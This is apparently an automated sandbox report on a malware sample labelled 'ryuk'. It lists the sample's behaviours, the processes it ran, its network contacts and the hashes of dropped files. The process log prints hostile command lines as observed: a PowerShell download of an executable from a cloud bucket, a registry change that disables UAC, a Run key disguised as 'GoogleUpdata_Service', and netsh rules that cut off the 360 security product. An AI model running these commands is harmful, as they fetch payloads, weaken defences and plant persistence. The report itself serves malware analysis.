| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\programdata\20250223024744\Agghosts.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\programdata\20250223024744\Agghosts.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024744\Agghosts.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024744\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024744\Agghosts.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024744\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024744\1.bat" "
C:\programdata\20250223024744\Agghosts.exe
"C:\programdata\20250223024744\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Public\Downloads\20250223024744\fhq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| N/A | 127.0.0.1:49226 | | tcp |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| CN | 103.235.47.188:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.23.205.233:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabE227.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarE43C.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2360-35-0x00000000042C0000-0x00000000046D9000-memory.dmp
memory/2360-36-0x0000000003EA0000-0x00000000042B4000-memory.dmp
memory/2360-37-0x00000000042C0000-0x00000000046D9000-memory.dmp
memory/2360-38-0x00000000003B0000-0x00000000003B1000-memory.dmp
C:\Users\Public\Downloads\20250223024744\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\ProgramData\20250223024744\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\ProgramData\lnk\2.lnk
| MD5 | 6fad1bf37c81f67455cf0a0c58a36ed0 |
| SHA1 | 16c12891c7a03ecc7368e27fa66e2b9bc82358a2 |
| SHA256 | 1e3dd035f7298068310ff06f8d4387cc239084a1590233fed5100663a1a70b81 |
| SHA512 | 2a1cebe1f6760ca088402b4c9725f706f16cd194d332c9c36415fc726504bea253319c1a6c85f20d32f2d42e71ff057a6fcab6baccc5d5871dbc30f231dd8139 |
C:\programdata\20250223024744\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\programdata\20250223024744\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
C:\Users\Public\Downloads\20250223024744\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
memory/2768-93-0x00000000004D0000-0x00000000004F9000-memory.dmp
memory/2360-99-0x0000000003EA0000-0x00000000042B4000-memory.dmp
memory/2360-98-0x00000000042C0000-0x00000000046D9000-memory.dmp
memory/544-105-0x000000001B620000-0x000000001B902000-memory.dmp
memory/544-106-0x00000000027F0000-0x00000000027F8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 38267d023abd6bf6c8425b2bc43be18a |
| SHA1 | 58f70c76e62487e0ec7c66a0ebb2efadcc698f8b |
| SHA256 | e9e94a30b36ca3fe3f93ecccbd53cb822c0c21cb41515a7d447f461558704de1 |
| SHA512 | e668f7c113938bf165ee0bc02b006dc2311085208962fa5b5a80f92487538db3684413c475119cd4b6a4900b2f07cfc84b2a44c0382d3e02cb30bf66fd8c8b7b |